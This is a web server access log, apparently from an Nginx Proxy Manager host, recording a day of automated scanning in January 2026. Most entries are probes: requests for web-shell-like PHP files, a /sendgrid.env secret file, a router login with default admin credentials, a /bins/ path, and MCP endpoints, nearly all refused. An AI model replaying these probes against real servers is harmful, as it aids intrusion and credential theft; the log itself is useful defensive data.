+[26/Jan/2026:23:16:50 +0000] 404 - GET http profibot.direct.quickconnect.to "/3yjf52pw.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:16:50 +0000] 404 - GET http profibot.direct.quickconnect.to "/RIP.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:16:50 +0000] 404 - GET http profibot.direct.quickconnect.to "/SE8Yj48YnI.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:16:50 +0000] 404 - GET http profibot.direct.quickconnect.to "/Styleshllnes.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:16:50 +0000] 404 - GET http profibot.direct.quickconnect.to "/aioezzqp.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:16:51 +0000] 404 - GET http profibot.direct.quickconnect.to "/bootstrap.cache.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:16:51 +0000] 404 - GET http profibot.direct.quickconnect.to "/clasa99.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:16:51 +0000] 404 - GET http profibot.direct.quickconnect.to "/ggm3g02p.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:16:51 +0000] 404 - GET http profibot.direct.quickconnect.to "/gs3zjvcs.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:16:52 +0000] 404 - GET http profibot.direct.quickconnect.to "/hu0cqgea.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:16:52 +0000] 404 - GET http profibot.direct.quickconnect.to "/ifl8614n.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:16:52 +0000] 404 - GET http profibot.direct.quickconnect.to "/k99zpp7x.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:16:52 +0000] 404 - GET http profibot.direct.quickconnect.to "/lvmkntmj.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:16:52 +0000] 404 - GET http profibot.direct.quickconnect.to "/o83l7c5r.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:16:53 +0000] 404 - GET http profibot.direct.quickconnect.to "/up01lmiz.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:16:53 +0000] 404 - GET http profibot.direct.quickconnect.to "/w90cxk5w.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:16:53 +0000] 404 - GET http profibot.direct.quickconnect.to "/zbl9cxhv.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:16:53 +0000] 404 - GET http profibot.direct.quickconnect.to "/kqkjkyey.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:16:54 +0000] 404 - GET http profibot.direct.quickconnect.to "/eece497f85.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:16:54 +0000] 404 - GET http profibot.direct.quickconnect.to "/cbdno.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:16:54 +0000] 404 - GET http profibot.direct.quickconnect.to "/dihyu.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:16:54 +0000] 404 - GET http profibot.direct.quickconnect.to "/%E2%80%89dxdwf.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:16:54 +0000] 404 - GET http profibot.direct.quickconnect.to "/iswfg.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:16:55 +0000] 404 - GET http profibot.direct.quickconnect.to "/jhcqx.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:16:55 +0000] 404 - GET http profibot.direct.quickconnect.to "/knqit.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:16:55 +0000] 404 - GET http profibot.direct.quickconnect.to "/mwqrq.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:16:55 +0000] 404 - GET http profibot.direct.quickconnect.to "/%E2%80%89ndnoq.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:16:56 +0000] 404 - GET http profibot.direct.quickconnect.to "/udnkq.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:16:56 +0000] 404 - GET http profibot.direct.quickconnect.to "/xopvne.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:16:56 +0000] 404 - GET http profibot.direct.quickconnect.to "/vxrl.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:16:56 +0000] 404 - GET http profibot.direct.quickconnect.to "/sko.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:16:56 +0000] 404 - GET http profibot.direct.quickconnect.to "/siln.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:16:57 +0000] 404 - GET http profibot.direct.quickconnect.to "/sad8210.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:16:57 +0000] 404 - GET http profibot.direct.quickconnect.to "/sad821.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:16:57 +0000] 404 - GET http profibot.direct.quickconnect.to "/menu.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:16:57 +0000] 404 - GET http profibot.direct.quickconnect.to "/2nzyHnOkEg.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:16:58 +0000] 404 - GET http profibot.direct.quickconnect.to "/.wp-db.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:16:58 +0000] 404 - GET http profibot.direct.quickconnect.to "/9EaklzMysJ.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:16:58 +0000] 404 - GET http profibot.direct.quickconnect.to "/sa.php7" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:16:58 +0000] 404 - GET http profibot.direct.quickconnect.to "/villain.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:16:58 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-22.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:16:59 +0000] 404 - GET http profibot.direct.quickconnect.to "/byp9.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:16:59 +0000] 404 - GET http profibot.direct.quickconnect.to "/an8.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:16:59 +0000] 404 - GET http profibot.direct.quickconnect.to "/co.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:16:59 +0000] 404 - GET http profibot.direct.quickconnect.to "/fs8.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:17:00 +0000] 404 - GET http profibot.direct.quickconnect.to "/fs9.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:17:00 +0000] 404 - GET http profibot.direct.quickconnect.to "/fput.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:17:00 +0000] 404 - GET http profibot.direct.quickconnect.to "/PEAR5.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:17:00 +0000] 404 - GET http profibot.direct.quickconnect.to "/71.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:17:00 +0000] 404 - GET http profibot.direct.quickconnect.to "/32next.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:17:01 +0000] 404 - GET http profibot.direct.quickconnect.to "/grab.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:17:01 +0000] 404 - GET http profibot.direct.quickconnect.to "/ar.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:17:01 +0000] 404 - GET http profibot.direct.quickconnect.to "/a89f2bb076.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:17:01 +0000] 404 - GET http profibot.direct.quickconnect.to "/cf2c7ba7c9.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:17:02 +0000] 404 - GET http profibot.direct.quickconnect.to "/9ad28be803.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:17:02 +0000] 404 - GET http profibot.direct.quickconnect.to "/9124d0b828.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:17:02 +0000] 404 - GET http profibot.direct.quickconnect.to "/4c01c0aad1.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:17:02 +0000] 404 - GET http profibot.direct.quickconnect.to "/42fc020de1.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:17:02 +0000] 404 - GET http profibot.direct.quickconnect.to "/3f1a74f9b9.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:17:03 +0000] 404 - GET http profibot.direct.quickconnect.to "/31df2a49f2.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:17:03 +0000] 404 - GET http profibot.direct.quickconnect.to "/1a68b583d7.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:17:03 +0000] 404 - GET http profibot.direct.quickconnect.to "/1165819e0c.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:17:12 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:23:24:28 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:23:28:00 +0000] 200 - GET http 91.82.215.191 "/" [Client 163.245.209.190] [Length 568] [Gzip 1.86] "Go-http-client/1.1" "-" +[26/Jan/2026:23:28:31 +0000] 200 - GET http 91.82.215.191 "/" [Client 117.55.202.152] [Length 568] [Gzip 1.86] "Python/3.12 aiohttp/3.13.3" "-" +[26/Jan/2026:23:34:22 +0000] 400 - GET http 91.82.215.191 "/" [Client 185.242.226.107] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" +[26/Jan/2026:23:36:40 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:23:44:04 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:23:48:16 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:23:56:14 +0000] 405 - POST http 91.82.215.191 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[27/Jan/2026:00:01:49 +0000] 404 - GET http profibot.direct.quickconnect.to "/sendgrid.env" [Client 45.139.104.168] [Length 122] [Gzip 1.35] "SonyEricssonW995/R1EA Profile/MIDP-2.1 Configuration/CLDC-1.1 UNTRUSTED/1.0" "-" +[27/Jan/2026:00:02:16 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:00:10:14 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:00:15:24 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:00:18:27 +0000] 200 - GET http 91.82.215.191 "/" [Client 147.185.133.62] [Length 568] [Gzip 1.86] "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity" "-" +[27/Jan/2026:00:28:16 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:00:32:45 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:00:39:27 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.69] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:00:46:04 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:00:48:27 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 185.243.96.116] [Length 154] [Gzip -] "-" "-" +[27/Jan/2026:00:48:27 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 185.243.96.116] [Length 154] [Gzip -] "-" "-" +[27/Jan/2026:00:48:43 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[27/Jan/2026:00:48:57 +0000] 404 - GET http 91.82.215.191 "/version" [Client 45.142.154.46] [Length 150] [Gzip -] "-" "-" +[27/Jan/2026:00:48:57 +0000] 200 - GET http 91.82.215.191 "/" [Client 45.142.154.46] [Length 1033] [Gzip -] "-" "-" +[27/Jan/2026:00:48:58 +0000] 200 - GET http 91.82.215.191 "/" [Client 45.142.154.46] [Length 1033] [Gzip -] "-" "-" +[27/Jan/2026:00:48:58 +0000] 404 - GET http 91.82.215.191 "/v1" [Client 45.142.154.46] [Length 150] [Gzip -] "-" "-" +[27/Jan/2026:00:48:59 +0000] 200 - GET http 91.82.215.191 "/" [Client 45.142.154.46] [Length 1033] [Gzip -] "-" "-" +[27/Jan/2026:00:49:00 +0000] 200 - GET http 91.82.215.191 "/" [Client 45.142.154.46] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" +[27/Jan/2026:00:49:00 +0000] 400 - GET http 91.82.215.191 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[27/Jan/2026:00:51:50 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:00:56:26 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:01:05:15 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:01:11:08 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[27/Jan/2026:01:15:53 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:01:19:41 +0000] 200 - GET http 91.82.215.191 "/" [Client 134.199.153.155] [Length 568] [Gzip 1.86] "Mozilla/5.0" "-" +[27/Jan/2026:01:19:41 +0000] 405 - POST http 91.82.215.191 "/" [Client 134.199.153.155] [Length 154] [Gzip -] "Mozilla/5.0" "-" +[27/Jan/2026:01:24:16 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:01:41:14 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:01:42:22 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:01:57:02 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[27/Jan/2026:01:57:45 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:02:04:41 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 194.164.107.5] [Length 154] [Gzip -] "-" "-" +[27/Jan/2026:02:08:31 +0000] 405 - POST http 91.82.215.191 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[27/Jan/2026:02:10:00 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:02:13:35 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:02:21:28 +0000] 200 - GET http 91.82.215.191 "/" [Client 194.164.107.5] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36" "-" +[27/Jan/2026:02:25:51 +0000] 200 - GET http 91.82.215.191 "/" [Client 67.205.190.253] [Length 568] [Gzip 1.86] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "-" +[27/Jan/2026:02:25:51 +0000] 400 - GET http 91.82.215.191 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[27/Jan/2026:02:27:11 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[27/Jan/2026:02:33:15 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:02:35:34 +0000] 200 - GET http 91.82.215.191 "/" [Client 1.12.226.163] [Length 568] [Gzip 1.86] "Go-http-client/1.1" "-" +[27/Jan/2026:02:40:59 +0000] 200 - GET http 91.82.215.191 "/" [Client 171.22.235.180] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" "-" +[27/Jan/2026:02:42:04 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:02:49:14 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[27/Jan/2026:02:51:51 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:02:56:46 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 198.235.24.37] [Length 1033] [Gzip -] "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity" "-" +[27/Jan/2026:02:57:55 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:03:03:37 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.18] [Length 1033] [Gzip -] "-" "-" +[27/Jan/2026:03:11:52 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:03:15:32 +0000] 400 - - http localhost "-" [Client 20.65.192.33] [Length 154] [Gzip -] "-" "-" +[27/Jan/2026:03:21:58 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 93.174.93.12] [Length 154] [Gzip -] "-" "-" +[27/Jan/2026:03:25:18 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:03:28:24 +0000] 404 - GET http localhost-nginx-proxy-manager "/boaform/admin/formLogin?username=admin&psd=admin" [Client 139.5.0.208] [Length 150] [Gzip -] "-" "-" +[27/Jan/2026:03:31:19 +0000] 404 - GET http 91.82.215.191 "/bins/" [Client 204.76.203.18] [Length 150] [Gzip -] "-" "-" +[27/Jan/2026:03:33:42 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:03:47:02 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:03:47:47 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:03:54:30 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:03:57:39 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[27/Jan/2026:03:58:47 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:04:10:16 +0000] 400 - GET http 91.82.215.191 "/" [Client 45.156.129.77] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36" "-" +[27/Jan/2026:04:10:18 +0000] 400 - POST http 91.82.215.191 "/mcp" [Client 45.156.129.75] [Length 252] [Gzip -] "python-httpx/0.28.1" "-" +[27/Jan/2026:04:10:18 +0000] 400 - GET http 91.82.215.191 "/sse" [Client 45.156.129.75] [Length 252] [Gzip -] "python-httpx/0.28.1" "-" +[27/Jan/2026:04:10:18 +0000] 400 - GET http 91.82.215.191 "/favicon.ico" [Client 45.156.129.77] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36" "-" +[27/Jan/2026:04:13:49 +0000] 200 - GET http 91.82.215.191 "/" [Client 84.1.117.224] [Length 1033] [Gzip -] "-" "-" +[27/Jan/2026:04:13:59 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:04:15:38 +0000] 200 - GET http 91.82.215.191 "/" [Client 134.199.153.155] [Length 568] [Gzip 1.86] "Mozilla/5.0" "-" +[27/Jan/2026:04:15:39 +0000] 405 - POST http 91.82.215.191 "/" [Client 134.199.153.155] [Length 154] [Gzip -] "Mozilla/5.0" "-" +[27/Jan/2026:04:24:31 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 198.235.24.249] [Length 154] [Gzip -] "-" "-" +[27/Jan/2026:04:24:31 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 198.235.24.249] [Length 154] [Gzip -] "-" "-" +[27/Jan/2026:04:28:56 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:04:28:57 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 